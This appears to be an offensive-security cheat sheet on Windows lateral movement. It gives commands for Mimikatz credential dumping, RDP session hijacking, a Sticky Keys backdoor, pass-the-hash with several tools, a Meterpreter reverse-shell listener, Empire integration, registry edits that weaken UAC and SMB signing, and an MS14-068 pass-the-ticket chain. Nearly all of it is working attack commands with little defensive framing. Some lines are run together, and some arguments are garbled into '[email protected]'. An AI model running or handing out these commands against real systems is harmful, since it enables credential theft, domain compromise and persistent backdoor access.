Table of Contents
- Tunneling
- Lateral movement with RDP
- Lateral movement with PTH (Pass The Hash)
- Check hashes against network
- 2018 update
- Lateral movement with PTT (Pass The Ticket)
To check if the credentials $USER / $PASSWORD are used in more computers in the network:
crackmapexec $IP/24 -u $USER -p $PASSWORD –lusers
Or using an Administrator hash and execute Mimikatz for plain text password gathering:
crackmapexec $IP/24 -u Administrator -H $HASH -d $DOMAIN -m modules/credentials/mimikatz.py
Run Powerview commands in crackmapexec:
crackmapexec smb $IP -d $DOMAIN -u $LOGIN -p $PASS -M powerview -o COMMAND="Get-NetDomain" --verbose
Tunneling
Traffic Encapsulation tools to bypass deep packet inspection:
http_tunnel stunnel
Lateral movement with RDP
Exploitation RDP 2011
Technique:
Any user in a local system with NT AUTHORITY/SYSTEM privileges can access any RDP connection done from that machine without knowing the credentials (~~ as “su – user” as root in linux?!)
And the legitimate user is logout immediately
Only using task manager (tscon.exe / tsadmin.msc) as administrator (right click, connect to)
Method 1
psexec -s \\localhost cmd
Method 2
query user sc create sesshijack binpath="cmd.exe /k tscon $ID /dest:$SESSIONNAME" net start sesshijack
Method 3 (with a password as a normal user AND without password as a SYSTEM user)
query user
or:
quser tscon $ID
Method 4 (physical access, boot backdoor)
Sticky Keys (sethc.exe)
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
Reboot… and then press 5 times a key to activate Sticky keys or F5 at login screen.
Lateral movement with PTH (Pass The Hash)
Requirement:
SMB connections over ports 139/445 to a writeable share (e.g. C$, admin$)
PTH from Linux
SMB
pth-winexe -U $DOMAIN/administrator%$NT_HASH:$NTLM_HASH //$IP cmd crackmapexec --exec-method=smbexec -u Administrator -H $HASH -x cmd.exe $IP python wmiexec.py -hashes :$HASH [email protected]$HOST
MS SQL
pth-sqsh -D$DATABASE_NAME -S$IP -U$SERVER_INSTANCE\\$USERNAME -mpretty
RDP
xfreerdp /u:$USER /d:$DOMAIN /pth:$NTLM /v:$IP:3389
Metasploit
msf> use exploit/windows/smb/psexec
Crackmapexec + Meterpreter
First, start meterpreter listener:
msf> use exploit/multi/handler msf> set payload windows/meterpreter/reverse_https msf> set LHOST $LOCALIP msf> set exitonsession false msf> exploit -j
crackmapexec $IP -u administrator -p $PASS -M metinject –o LHOST=$LOCALIP LPORT=444
Crackmapexec + Empire
python empire --rest --user empireadmin --pass Password123!
Edit ~/.cme/cme.conf:
[Empire] api_host=127.0.0.1 api_port=1337 username=empireadmin password=Password123! [Metasploit] rpc_host=127.0.0.1 rpc_port=55552 password=abc123
crackmapexec $IP/24 -u username -p password -M empire_exec -o LISTENER=test
References:
PTH from Windows
For windows use mimikatz or lmpacket wmiexec
PTH with mimikatz:
mimikatz.exe mimikatz# privilege::debug mimikatz# sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$HASH
That should open a cmd.exe on the target machine.
Check hashes against network
medusa -C pwdump.jd -M smbnt -H smb_hosts2.txt -m PASS:HASH -t 20 -T 10 2> /dev/null | tee medusa.smbnt crackmapexec $IP/24 -u Administrator -H $HASH
2018 update
Problems with/Defence systems: UAC
SMB signing required when STATUS_ACCESS_DENIED "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature" = 0 WDigest Authentication "SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential" “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy” = 1
Passing the hash does not work in all cases. For example, Windows Defender Credential Guard protects against this.
You wouldn’t even be able to pass the Administrator hash. You would need to turn off Windows Defender first.
Additionally, you might have to edit the Registry.
Windows operating systems starting with Vista have a User Account Control (UAC) policy setting that disallows other
local administrators from running privileged tasks across the network. If you want to pass the hash of another local admin,
you could disable the restriction by navigating the Registry to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Policies\System,
and then creating a DWORD entry of LocalAccountTokenFilterPolicy with a value of 1.
Lateral movement with PTT (Pass The Ticket)
Attack is against DC with a valid user/ntlm hash
whoami /user python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc --rc4 <ntlmHash> python ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> --rc4 <ntmlHash> klist klist purge mimikatz.exe "kerberos::ptc T[email protected]" exit` # Generated file must be injected into memory klist net use \\$PDC\admin$ net use k: \\$PDC\c$ psexec \\$PDC\ cmd.exe whoami /groups
